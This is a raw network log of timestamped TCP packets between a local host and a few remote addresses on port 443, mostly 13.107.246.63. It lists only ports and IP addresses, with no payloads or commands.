Nov 25, 2024 15:22:07.341026068 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.341151953 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.344116926 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.344202042 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.362442017 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.369160891 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.377811909 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.466007948 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.566732883 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.569688082 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.579054117 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.579175949 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.581712961 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.667402983 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.670088053 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.678292990 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.678308010 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.678363085 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.681288958 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.682051897 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.700069904 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.707406998 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.794245958 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.804820061 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.805444956 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.904340982 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.908632994 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:07.995423079 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:07.995556116 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.006055117 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.006182909 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.012157917 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.012269974 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.012357950 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.012392998 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.028985977 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.242964983 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.298346996 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.386502981 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.416971922 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.418853045 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.419133902 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.424030066 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.510176897 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.541935921 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.557485104 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.557496071 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.557504892 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.714462042 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.714473963 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.714565039 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.745309114 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.758167028 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.765114069 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.765212059 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.765222073 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.773514986 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.774336100 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.865907907 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.893589973 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.894407988 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.915595055 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:08.948002100 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:08.948558092 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.001507998 CET  49673        443        192.168.2.8     23.206.229.226
Nov 25, 2024 15:22:09.073266983 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.097130060 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.103244066 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.103257895 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.103360891 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.129065990 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.130042076 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.130163908 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.280590057 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.280674934 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.280819893 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.282738924 CET  49672        443        192.168.2.8     23.206.229.226
Nov 25, 2024 15:22:09.284965038 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.285315037 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.411161900 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.467773914 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.481513977 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.484683990 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.636251926 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.636318922 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.636413097 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.640811920 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.641731977 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.684554100 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.684577942 CET  443          49703      13.107.246.63   192.168.2.8
Nov 25, 2024 15:22:09.684711933 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.687763929 CET  49703        443        192.168.2.8     13.107.246.63
Nov 25, 2024 15:22:09.687876940 CET  49703        443        192.168.2.8     13.107.246.63
                                                                                                        Nov 25, 2024 15:22:09.763381958 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:09.808427095 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:09.837331057 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:09.841417074 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:09.981029034 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:09.981101036 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:09.981165886 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:09.981165886 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:09.984020948 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:09.984138012 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.019975901 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.019989967 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.020095110 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.022905111 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.022989035 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.106215954 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.180397987 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.220946074 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.223850012 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.377295971 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.377311945 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.377429008 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.380949974 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.380994081 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.507659912 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.507675886 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.507718086 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.507750988 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.510648012 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.510760069 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.617856979 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.617978096 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.618061066 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.620568991 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.631082058 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.708410978 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.708486080 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.708523989 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.708570004 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.711941004 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.712857008 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.790971041 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.839647055 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.839682102 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.839715958 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.839761019 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.850657940 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.854296923 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:10.863699913 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.983290911 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:10.983305931 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.041104078 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.045176983 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.068218946 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.068296909 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.068408966 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.068520069 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.072604895 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.072685003 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.165364981 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.192534924 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.192606926 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.192646027 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.192677975 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.196111917 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.197725058 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.199242115 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.319788933 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.393476963 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.397651911 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.402602911 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.402640104 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.402666092 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.402689934 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.405491114 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.405715942 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.527204037 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.527235985 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.527265072 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.527302980 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.530122995 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.530730009 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.530812025 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.655730963 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.728152990 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.731329918 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.738132954 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.738213062 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.738224983 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.738281012 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.740921021 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.741035938 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.861499071 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.867152929 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.867202044 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:11.867336035 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.879827976 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:11.880610943 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.007354021 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.062880993 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.065975904 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.067933083 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.068022013 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.070718050 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.190726042 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.208069086 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.211189032 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.216830969 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.216887951 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.216900110 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.216929913 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.219773054 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.219994068 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.340607882 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.392437935 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.395682096 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.419090033 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.423263073 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.545733929 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.545757055 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.545897007 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.595151901 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.618519068 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.673386097 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.746572971 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.797523022 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.798198938 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.801004887 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.821609020 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.869358063 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.873006105 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:12.917768955 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.918169975 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.921118975 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.943490982 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:12.993478060 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.123903036 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.131567955 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.131699085 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.131728888 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.132785082 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.138559103 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.139261961 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.194895983 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.194947004 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.198069096 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.256814003 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.263205051 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.264131069 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.319541931 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.325695992 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.339644909 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.465424061 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.470366955 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.474930048 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.474946022 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.475339890 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.478276014 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.478276014 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.526515007 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.529299021 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:13.598903894 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:13.639187098 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:18.909440994 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:18.909478903 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:18.909495115 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:18.909523964 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:18.914272070 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:18.914885998 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.019989014 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.020068884 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.023181915 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.034419060 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.079157114 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.110382080 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.113483906 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.143374920 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.234635115 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.235558033 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.238692045 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.242399931 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.242464066 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.242491961 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.242539883 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.244748116 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.244869947 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.370737076 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.435908079 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.439179897 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.444263935 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.446336031 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.571918964 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.571988106 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.574728966 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.578716993 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.578922033 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.578999043 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.581290007 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.581356049 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.701432943 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.748397112 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.781022072 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.785053015 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.895905018 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.895992994 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.905189991 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.908696890 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.921709061 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.921849966 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:19.921905994 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.924895048 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:19.926673889 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.030123949 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.034380913 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.046994925 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.122778893 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.124216080 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.127636909 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.194860935 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.247628927 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.257963896 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.257999897 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.258090019 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.261141062 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.261192083 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.355642080 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.365608931 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.391443968 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.448976040 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.450592995 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.453275919 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.458669901 CET4434970313.107.246.63192.168.2.8
                                                                                                        Nov 25, 2024 15:22:20.464633942 CET49703443192.168.2.813.107.246.63
                                                                                                        Nov 25, 2024 15:22:20.527051926 CET4434970313.107.246.63192.168.2.8
